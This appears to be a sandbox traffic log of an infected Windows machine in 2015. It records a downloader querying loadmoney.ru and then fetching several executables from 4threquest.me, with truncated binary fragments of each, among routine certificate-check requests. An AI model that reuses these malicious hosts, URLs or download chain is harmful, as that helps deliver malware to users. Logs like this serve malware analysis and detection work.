Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.K...H.....0..
GET /get_info?pid=7718 HTTP/1.1
Accept: */*
Host: loadmoney.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: text/html
Content-Length: 70
Connection: keep-alive
X-Powered-By: PHP/5.4.40
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru
{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=329046, public, no-transform, must-revalidate
Last-Modified: Mon, 27 Apr 2015 18:34:46 GMT
Expires: Mon, 4 May 2015 18:34:46 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..20150427183446Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...313..R...%V.......K3.....20150427183446Z....20150504183446Z0...*.H.............<........4Tl |..2e....".....7..\.|........H...LdiH..C.#=ty.A.m2."......,....F..eK.H...t.C...Ak.y...M4.d..n.N..X.Jn...^....:...~.}R.b..k]....E.]...&...0?.]....8..*E8..1'E:a<..~N.....A...=...d.6...7..._..R..G.....A%h.0jN.H....`u...^.YX.DW\3$.yG..g..BW....!......0...0...0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G50...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Certificate 30.."0...*.H.............0...............2&..PL...,..2....:..tH...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s.....3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$"..$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=561798, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:15:29 GMT
Expires: Thu, 7 May 2015 11:15:29 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....20150430111529Z0s0q0I0... ...................F....0.yV......{&.K......&..........'pB.....@j.......20150430111529Z....20150507111529Z0...*.H..............9K....i...{.-.?j.L...Y{:.;G<Xq>a.........p..f..N...F.Ki>*.l...FzN...*JT...YJ]...2.K.....\.=.Y.LG....L..@.;..^.PS.Gs....'KJ...8......jE#U1}._.HV...)q_Y<}'t........f(.l .W$....#U....G...q.D...2.K...L.../...m.t....,.gHk~y..$X.....RH7|.^..h=...uV)..".............0...0...0............F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..............-..^.........f.P`...s.....8.....V.......... .... B.
<<< skipped >>>
GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482883
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edc007da0f4b-FRA
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0...*.H.............&...f#...5.[4........{pV.#.F........:...*Q.....Mx9}....,.S.D.>@.Ju.[)c...`.?.j~...-..{.FHj.....#.C2.[.,`.......)...Bj2........n...........%......p.6......Q.....1..pd......F.........mJO.!y.W.......V.M).N.R.....V..|...7.ry. ..gy..I\.........j....... .z.E..".
<<< skipped >>>
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.sR'..i..0.0... .....0...0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,ck.Z....,E....."...C].#...............nzN....A
<<< skipped >>>
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F......0.0... .....0...0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F........20150430130944Z....20150507130944Z0...*.H.............<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'..........}=......J. ....I...|@zj..._J(.... ...
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 867
Date: Thu, 30 Apr 2015 23:11:56 GMT
Connection: keep-alive
0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.....[...`.I.(.i;...(....aW7.t..t.:.r/.......=...3.. .S.:.s..A. :......O..2`.W....hh.8&`u..w..... I..@.H..1a.^....w.d.z._....b..l.Ti....n...qv.i.........B0@0...U...........0...U.......0....0...U........K...E$.MP.c.......0...*.H.............K@..P.......TEI....A.....(.3.k.t...-..........sgJ..D{x..nlo.).39E....Wl.....S.-.$l..c..ShgV>...5!..h....S......]F...zX(./....7A..Dm.S(.~.g.........L'.L.ssv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%..@.;,.x.a/....Uo.....M.(.r..bPe.....1....GX?_
<<< skipped >>>
GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 594
Connection: keep-alive
Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482884
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edbc30fe046d-FRA
0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141125000000Z0.0...U.......0*........%..@...141125000000Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t.T_.....Y.R......p OS..2.s........(C.e.x3.#.d6L.d=.UI.;T..G...mx....... .......-........-.....J....$.Ko.e#......3....*..3.s...0.........N..W?'.U...f..h..e...m.9.
<<< skipped >>>
GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119928, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:15:51 GMT
Expires: Sat, 02 May 2015 10:15:51 GMT
ETag: "b2a2c0ce8f0f9b25572e41e1706cd0a01fa1f1ef"
Content-Length: 1741
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G2..20150430221551Z0d0b0:0... .........#o..K......#..... ...:....g(.....An ............20150430221551Z....20150502101551Z0...*.H.............oI..C>./|..o.....{.#..C....a.......V. H..j"P.....*M:m...&...s.....5/|49..|.....N....6..{.Z...H.I,..(...,....\k..w.%A....@.......)f.>:.;..^. .k...}.]._...?=bF?.....J.:.O.$.. .N..O.......Bg......9....UYx.".....\..W..]L..0.I_.....g..f..I.8....K^.;....oK.R........0...0...0..q..........t....o0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p.........0..0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0@..U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H.............bW%D.2.X..U[0d..........|.BaG.Y.?.u...\...M..
<<< skipped >>>
GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {. . ApiBlock = false;. //document.write(unescape(""));. . document.write(unescape(""));. . . . document.write(unescape(""));. function MobiMidia_addOption(selectId, txt, val, selected) {..var objOption = new Option(txt, val, selected);..self.document.getElementById(selectId).options.add(objOption);. }. function MobiMidia_keyNumber(e) {. if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);. filteredValues = "1234567890";. if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;. }. }. function MobiMidia_AtivaCel() {. if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {. self.document.getElementById('MobiMidia_Number').focus();. }. }. . function MobiMidia_NonoDigito() {. if (self.document.getElementById('MobiMidia_DDD').value < 30) {.
<<< skipped >>>
GET /ironsrc_prot.png?nocache=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: desprotetordelinks.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:09 GMT
Content-Type: image/png
Content-Length: 14566
Connection: keep-alive
Last-Modified: Mon, 16 Mar 2015 23:54:21 GMT
ETag: "5720b2-38e6-5117091a3e540"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
.PNG........IHDR...&.........2.K.....pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Thu, 30 Apr 2015 23:11:15 GMT
Connection: keep-alive
GET /310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 36948
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s....... ...............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc........ .......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 688202
Last-Modified: Sat, 11 Apr 2015 13:41:40 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................@.............@.................................N............@..............................P.......T...........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...T...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523272
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z....... ...0.......p....@.......................... ...............................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......p...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....nD..H.P.u..u..u...Hr@..B...SV.5.nD..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
GET /310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U.................<...T......3o.......P....@..................................t....@..................................i..........................`........;..`S..8............................D..@............P...............................text....:.......<.................. ..`.rdata...(...P...*...@..............@..@.data....g.......F...j..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..V...y-...E..t.V..6.......^]...................O-.............U..j.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,..h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>
GET /310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 101527
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_cp.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@..................................................................................p...............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata.......p...........................rsrc........p......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 401 Unauthorized
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
0......
